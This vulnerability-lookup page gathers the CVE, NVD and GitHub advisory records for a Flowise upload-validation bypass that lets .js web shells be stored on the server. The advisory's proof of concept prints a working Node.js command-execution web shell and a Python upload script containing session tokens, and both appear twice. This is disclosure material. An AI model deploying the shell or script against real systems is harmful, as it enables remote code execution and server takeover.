CVE-2026-41269 (GCVE-0-2026-41269)
Vulnerability from cvelistv5 – Published: 2026-04-23 19:14 – Updated: 2026-04-23 19:14
VLAI?
Title
Flowise: File Upload Validation Bypass in createAttachment
Summary
Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.1.0, the Chatflow configuration file upload settings can be modified to allow the application/javascript MIME type. This lets an attacker upload .js files even though the frontend doesn’t normally allow JavaScript uploads. This enables attackers to persistently store malicious Node.js web shells on the server, potentially leading to Remote Code Execution (RCE). This vulnerability is fixed in 3.1.0.
Severity ?
7.1 (High)
CWE
- CWE-434 - Unrestricted Upload of File with Dangerous Type
Assigner
References
| URL | Tags | ||||
|---|---|---|---|---|---|
|
|||||
{
"containers": {
"cna": {
"affected": [
{
"product": "Flowise",
"vendor": "FlowiseAI",
"versions": [
{
"status": "affected",
"version": "\u003c 3.1.0"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Flowise is a drag \u0026 drop user interface to build a customized large language model flow. Prior to 3.1.0, the Chatflow configuration file upload settings can be modified to allow the application/javascript MIME type. This lets an attacker upload .js files even though the frontend doesn\u2019t normally allow JavaScript uploads. This enables attackers to persistently store malicious Node.js web shells on the server, potentially leading to Remote Code Execution (RCE). This vulnerability is fixed in 3.1.0."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-434",
"description": "CWE-434: Unrestricted Upload of File with Dangerous Type",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-04-23T19:14:26.918Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-rh7v-6w34-w2rr",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-rh7v-6w34-w2rr"
}
],
"source": {
"advisory": "GHSA-rh7v-6w34-w2rr",
"discovery": "UNKNOWN"
},
"title": "Flowise: File Upload Validation Bypass in createAttachment"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2026-41269",
"datePublished": "2026-04-23T19:14:26.918Z",
"dateReserved": "2026-04-18T14:01:46.801Z",
"dateUpdated": "2026-04-23T19:14:26.918Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"vulnerability-lookup:meta": {
"nvd": "{\"cve\":{\"id\":\"CVE-2026-41269\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-04-23T20:16:15.417\",\"lastModified\":\"2026-04-23T20:16:15.417\",\"vulnStatus\":\"Received\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Flowise is a drag \u0026 drop user interface to build a customized large language model flow. Prior to 3.1.0, the Chatflow configuration file upload settings can be modified to allow the application/javascript MIME type. This lets an attacker upload .js files even though the frontend doesn\u2019t normally allow JavaScript uploads. This enables attackers to persistently store malicious Node.js web shells on the server, potentially leading to Remote Code Execution (RCE). This vulnerability is fixed in 3.1.0.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N\",\"baseScore\":7.1,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"LOW\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":2.8,\"impactScore\":4.2}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-434\"}]}],\"references\":[{\"url\":\"https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-rh7v-6w34-w2rr\",\"source\":\"security-advisories@github.com\"}]}}"
}
}
FKIE_CVE-2026-41269
Vulnerability from fkie_nvd - Published: 2026-04-23 20:16 - Updated: 2026-04-23 20:16
Severity ?
Summary
Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.1.0, the Chatflow configuration file upload settings can be modified to allow the application/javascript MIME type. This lets an attacker upload .js files even though the frontend doesn’t normally allow JavaScript uploads. This enables attackers to persistently store malicious Node.js web shells on the server, potentially leading to Remote Code Execution (RCE). This vulnerability is fixed in 3.1.0.
References
Impacted products
| Vendor | Product | Version |
|---|
{
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Flowise is a drag \u0026 drop user interface to build a customized large language model flow. Prior to 3.1.0, the Chatflow configuration file upload settings can be modified to allow the application/javascript MIME type. This lets an attacker upload .js files even though the frontend doesn\u2019t normally allow JavaScript uploads. This enables attackers to persistently store malicious Node.js web shells on the server, potentially leading to Remote Code Execution (RCE). This vulnerability is fixed in 3.1.0."
}
],
"id": "CVE-2026-41269",
"lastModified": "2026-04-23T20:16:15.417",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 4.2,
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
},
"published": "2026-04-23T20:16:15.417",
"references": [
{
"source": "security-advisories@github.com",
"url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-rh7v-6w34-w2rr"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Received",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-434"
}
],
"source": "security-advisories@github.com",
"type": "Primary"
}
]
}
GHSA-RH7V-6W34-W2RR
Vulnerability from github – Published: 2026-04-16 21:49 – Updated: 2026-04-16 21:49
VLAI?
Summary
Flowise: File Upload Validation Bypass in createAttachment
Details
Summary
In FlowiseAI, the Chatflow configuration file upload settings can be modified to allow the application/javascript MIME type. This lets an attacker upload .js files even though the frontend doesn’t normally allow JavaScript uploads. This enables attackers to persistently store malicious Node.js web shells on the server, potentially leading to Remote Code Execution (RCE).
Details
This is a bypass of GHSA‑35g6‑rrw3‑v6xc (CVE‑2025‑61687). The Chatflow file upload settings do not properly validate MIME types. An attacker can add the application/javascript MIME type when updating a Chatflow, allowing .js files to be uploaded.
JavaScript files are not listed as an option for file upload types within web user interface:
PoC
shell.js (Node.js Web Shell)
const { exec } = require('child_process');
const http = require('http');
const server = http.createServer((req, res) => {
const url = new URL(req.url, 'http://localhost');
const cmd = url.searchParams.get('cmd');
if (cmd) {
console.log(`Executing: ${cmd}`);
exec(cmd, (error, stdout, stderr) => {
res.writeHead(200, {'Content-Type': 'text/plain'});
if (error) {
res.end(`Error: ${error.message}\n${stderr || ''}`);
} else {
res.end(stdout || 'Command executed successfully');
}
});
} else {
res.writeHead(200, {'Content-Type': 'text/html'});
res.end(`
<h1>Node.js Web Shell</h1>
<p>Use ?cmd=command to execute</p>
<p>Example: ?cmd=id</p>
`);
}
});
const PORT = 8888;
server.listen(PORT, '0.0.0.0', () => {
console.log(`Shell running on port ${PORT}`);
console.log(`Access: http://localhost:${PORT}?cmd=id`);
});
Python Upload Script
import requests
import uuid
TARGET_URL = "http://192.168.236.131:3000"
CHATFLOW_ID = "dfd67fff-23b5-4f62-a0b3-59963cabc3b2"
cookie_str = 'token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6ImEzZGNlMjgyLTE1ZDUtNDYwMi04MjI2LTc1MmQzYzExYzI5NyIsInVzZXJuYW1lIjoiYWRtaW4iLCJtZXRhIjoiOTRiOGY2MTIyMzI3ZmFmODg0YzM4OGM4Y2YwZTg3ZGU6MTVkNDc4MDFjNTQ0N2Q3NDU2Mzg3OWE2N2E5YmJjNmM0M2JiYjYzNDE0Y2MzZWY2ZThkYjAzZTRhNjM3MjBiNzA5NmI3YmIwMGM3YWI3YTRmM2QzN2E2OTRiMGVmY2UzOTFiZGU3MWJiNWViZDIyN2ZhNzc0NmQ0ZjFmNTM5NTFhOGJkNjdlMzEyZjMzOTk5OWQ0ZGNkYmVmYWU3OWI4NSIsImlhdCI6MTc2Nzg1ODE2NSwibmJmIjoxNzY3ODU4MTY1LCJleHAiOjE3Njc4NjE3NjUsImF1ZCI6IkFVRElFTkNFIiwiaXNzIjoiSVNTVUVSIn0.lUtIFztKIT6Ld8cnPaPnPfm0B47yhurPJRW6JhtSwu8; refreshToken=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6ImEzZGNlMjgyLTE1ZDUtNDYwMi04MjI2LTc1MmQzYzExYzI5NyIsInVzZXJuYW1lIjoiYWRtaW4iLCJtZXRhIjoiOThmZGE5YWE2MDZhYTA3YTMxYjZlYzhjZTkyMmZkMDA6ZTU2ZTczMTEwYjY3ZDE3ZTM3MjViZWI2YzMyYWYzNTNkOWExNzIzZWU0NzdiN2ZiMDQ1N2Q0M2JmZTY0NTIxZTlkNjM2ZWQwODgxNWJiNzU4Mjg2ZDQ3OGMwNTA3NTRkZTgwMWIwODljNDQ5YjhhZjVkODU2YWFiMzk4NTBjNjNlZjRmY2UzMmY4YWYzZmQxNGQzMmVhYzVhYjVmM2NjZCIsImlhdCI6MTc2Nzg1MzU4NSwibmJmIjoxNzY3ODUzNTg1LCJleHAiOjE3NzU2Mjk1ODUsImF1ZCI6IkFVRElFTkNFIiwiaXNzIjoiSVNTVUVSIn0.U3mm0ONOeGFP1gD-mPT90Iz_Ewwf-YXzmTPwoOEHG_g; connect.sid=s%3Avwp7SDKi02Mzu_nTF3-IZ-RfgmMnnp5o.K7kb5eg9CJ%2FuxupG4rJrT6I0fu0H93OTd5trNC0u88Y'
js_mime_type = 'application/javascript'
CHAT_ID = str(uuid.uuid4())
def configure_chatflow_uploadfile():
url = f"{TARGET_URL}/api/v1/chatflows/{CHATFLOW_ID}"
headers = {'Cookie': cookie_str, 'x-request-from': 'internal'}
chatbot_configdata = {"chatbotConfig":'{\"fullFileUpload\":{\"status\":true,\"allowedUploadFileTypes\":\"' + js_mime_type + ',text/css,text/csv,text/html,application/json,text/markdown,application/x-yaml,application/pdf,application/sql,text/plain,application/xml,application/msword,application/vnd.openxmlformats-officedocument.wordprocessingml.document,application/vnd.openxmlformats-officedocument.spreadsheetml.sheet,application/vnd.openxmlformats-officedocument.presentationml.presentation\",\"pdfFile\":{\"usage\":\"perPage\",\"legacyBuild\":false}}}'}
r = requests.put(url, headers=headers, json = chatbot_configdata)
if js_mime_type in r.text:
print("[+] Enabled .js file uploads")
else:
print("[-] Failed to enable .js file uploads")
def upload_shell():
url = f"{TARGET_URL}/api/v1/attachments/{CHATFLOW_ID}/{CHAT_ID}"
headers = {'Cookie': cookie_str}
files = {'files': ('shell.js', open('shell.js', 'rb'), 'application/javascript')}
r = requests.post(url, headers=headers, files=files)
if r.status_code == 200:
print("[+] Upload success")
print(r.text)
else:
print(f"[-] Upload failed ({r.status_code})")
print(r.text)
if __name__ == "__main__":
configure_chatflow_uploadfile()
upload_shell()
Impact
An attacker can persistently upload and store malicious web shells on the server. If executed, this leads to Remote Code Execution (RCE). The risk increases if administrators unknowingly trigger the shell or if other vulnerabilities are chained to execute the file. This presents a high-severity threat to system integrity and confidentiality.
Severity ?
7.1 (High)
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 3.0.13"
},
"package": {
"ecosystem": "npm",
"name": "flowise"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.1.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-434"
],
"github_reviewed": true,
"github_reviewed_at": "2026-04-16T21:49:28Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "### Summary\nIn FlowiseAI, the Chatflow configuration file upload settings can be modified to allow the application/javascript MIME type. This lets an attacker upload .js files even though the frontend doesn\u2019t normally allow JavaScript uploads. This enables attackers to persistently store malicious Node.js web shells on the server, potentially leading to Remote Code Execution (RCE).\n\n### Details\nThis is a bypass of [GHSA\u201135g6\u2011rrw3\u2011v6xc](https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-35g6-rrw3-v6xc) (CVE\u20112025\u201161687). The Chatflow file upload settings do not properly validate MIME types. An attacker can add the `application/javascript` MIME type when updating a Chatflow, allowing .js files to be uploaded.\n\nJavaScript files are not listed as an option for file upload types within web user interface:\n\u003cimg width=\"1162\" height=\"440\" alt=\"Screenshot 2026-01-08 152306\" src=\"https://github.com/user-attachments/assets/f33f04af-877e-4aac-95a7-86d4684891de\" /\u003e\n\n\n\n### PoC\n#### shell.js (Node.js Web Shell)\n```\nconst { exec } = require(\u0027child_process\u0027);\nconst http = require(\u0027http\u0027);\n\nconst server = http.createServer((req, res) =\u003e {\n const url = new URL(req.url, \u0027http://localhost\u0027);\n const cmd = url.searchParams.get(\u0027cmd\u0027);\n\n if (cmd) {\n console.log(`Executing: ${cmd}`);\n exec(cmd, (error, stdout, stderr) =\u003e {\n res.writeHead(200, {\u0027Content-Type\u0027: \u0027text/plain\u0027});\n if (error) {\n res.end(`Error: ${error.message}\\n${stderr || \u0027\u0027}`);\n } else {\n res.end(stdout || \u0027Command executed successfully\u0027);\n }\n });\n } else {\n res.writeHead(200, {\u0027Content-Type\u0027: \u0027text/html\u0027});\n res.end(`\n \u003ch1\u003eNode.js Web Shell\u003c/h1\u003e\n \u003cp\u003eUse ?cmd=command to execute\u003c/p\u003e\n \u003cp\u003eExample: ?cmd=id\u003c/p\u003e\n `);\n }\n});\n\nconst PORT = 8888;\nserver.listen(PORT, \u00270.0.0.0\u0027, () =\u003e {\n console.log(`Shell running on port ${PORT}`);\n console.log(`Access: http://localhost:${PORT}?cmd=id`);\n});\n```\n\n#### Python Upload Script\n```\nimport requests\nimport uuid\n\nTARGET_URL = \"http://192.168.236.131:3000\"\nCHATFLOW_ID = \"dfd67fff-23b5-4f62-a0b3-59963cabc3b2\"\ncookie_str = \u0027token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6ImEzZGNlMjgyLTE1ZDUtNDYwMi04MjI2LTc1MmQzYzExYzI5NyIsInVzZXJuYW1lIjoiYWRtaW4iLCJtZXRhIjoiOTRiOGY2MTIyMzI3ZmFmODg0YzM4OGM4Y2YwZTg3ZGU6MTVkNDc4MDFjNTQ0N2Q3NDU2Mzg3OWE2N2E5YmJjNmM0M2JiYjYzNDE0Y2MzZWY2ZThkYjAzZTRhNjM3MjBiNzA5NmI3YmIwMGM3YWI3YTRmM2QzN2E2OTRiMGVmY2UzOTFiZGU3MWJiNWViZDIyN2ZhNzc0NmQ0ZjFmNTM5NTFhOGJkNjdlMzEyZjMzOTk5OWQ0ZGNkYmVmYWU3OWI4NSIsImlhdCI6MTc2Nzg1ODE2NSwibmJmIjoxNzY3ODU4MTY1LCJleHAiOjE3Njc4NjE3NjUsImF1ZCI6IkFVRElFTkNFIiwiaXNzIjoiSVNTVUVSIn0.lUtIFztKIT6Ld8cnPaPnPfm0B47yhurPJRW6JhtSwu8; refreshToken=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6ImEzZGNlMjgyLTE1ZDUtNDYwMi04MjI2LTc1MmQzYzExYzI5NyIsInVzZXJuYW1lIjoiYWRtaW4iLCJtZXRhIjoiOThmZGE5YWE2MDZhYTA3YTMxYjZlYzhjZTkyMmZkMDA6ZTU2ZTczMTEwYjY3ZDE3ZTM3MjViZWI2YzMyYWYzNTNkOWExNzIzZWU0NzdiN2ZiMDQ1N2Q0M2JmZTY0NTIxZTlkNjM2ZWQwODgxNWJiNzU4Mjg2ZDQ3OGMwNTA3NTRkZTgwMWIwODljNDQ5YjhhZjVkODU2YWFiMzk4NTBjNjNlZjRmY2UzMmY4YWYzZmQxNGQzMmVhYzVhYjVmM2NjZCIsImlhdCI6MTc2Nzg1MzU4NSwibmJmIjoxNzY3ODUzNTg1LCJleHAiOjE3NzU2Mjk1ODUsImF1ZCI6IkFVRElFTkNFIiwiaXNzIjoiSVNTVUVSIn0.U3mm0ONOeGFP1gD-mPT90Iz_Ewwf-YXzmTPwoOEHG_g; connect.sid=s%3Avwp7SDKi02Mzu_nTF3-IZ-RfgmMnnp5o.K7kb5eg9CJ%2FuxupG4rJrT6I0fu0H93OTd5trNC0u88Y\u0027\njs_mime_type = \u0027application/javascript\u0027\nCHAT_ID = str(uuid.uuid4())\n\ndef configure_chatflow_uploadfile():\n url = f\"{TARGET_URL}/api/v1/chatflows/{CHATFLOW_ID}\"\n headers = {\u0027Cookie\u0027: cookie_str, \u0027x-request-from\u0027: \u0027internal\u0027}\n chatbot_configdata = {\"chatbotConfig\":\u0027{\\\"fullFileUpload\\\":{\\\"status\\\":true,\\\"allowedUploadFileTypes\\\":\\\"\u0027 + js_mime_type + \u0027,text/css,text/csv,text/html,application/json,text/markdown,application/x-yaml,application/pdf,application/sql,text/plain,application/xml,application/msword,application/vnd.openxmlformats-officedocument.wordprocessingml.document,application/vnd.openxmlformats-officedocument.spreadsheetml.sheet,application/vnd.openxmlformats-officedocument.presentationml.presentation\\\",\\\"pdfFile\\\":{\\\"usage\\\":\\\"perPage\\\",\\\"legacyBuild\\\":false}}}\u0027}\n r = requests.put(url, headers=headers, json = chatbot_configdata)\n\n if js_mime_type in r.text:\n print(\"[+] Enabled .js file uploads\")\n else:\n print(\"[-] Failed to enable .js file uploads\")\n\ndef upload_shell():\n url = f\"{TARGET_URL}/api/v1/attachments/{CHATFLOW_ID}/{CHAT_ID}\"\n headers = {\u0027Cookie\u0027: cookie_str}\n files = {\u0027files\u0027: (\u0027shell.js\u0027, open(\u0027shell.js\u0027, \u0027rb\u0027), \u0027application/javascript\u0027)}\n r = requests.post(url, headers=headers, files=files)\n\n if r.status_code == 200:\n print(\"[+] Upload success\")\n print(r.text)\n else:\n print(f\"[-] Upload failed ({r.status_code})\")\n print(r.text)\n\nif __name__ == \"__main__\":\n configure_chatflow_uploadfile()\n upload_shell()\n```\n\u003cimg width=\"839\" height=\"231\" alt=\"image\" src=\"https://github.com/user-attachments/assets/0d2e8384-8da6-4ada-a81a-a85c49476673\" /\u003e\n\n\n### Impact\nAn attacker can persistently upload and store malicious web shells on the server. If executed, this leads to Remote Code Execution (RCE). The risk increases if administrators unknowingly trigger the shell or if other vulnerabilities are chained to execute the file. This presents a high-severity threat to system integrity and confidentiality.",
"id": "GHSA-rh7v-6w34-w2rr",
"modified": "2026-04-16T21:49:28Z",
"published": "2026-04-16T21:49:28Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-rh7v-6w34-w2rr"
},
{
"type": "PACKAGE",
"url": "https://github.com/FlowiseAI/Flowise"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N",
"type": "CVSS_V3"
}
],
"summary": "Flowise: File Upload Validation Bypass in createAttachment"
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…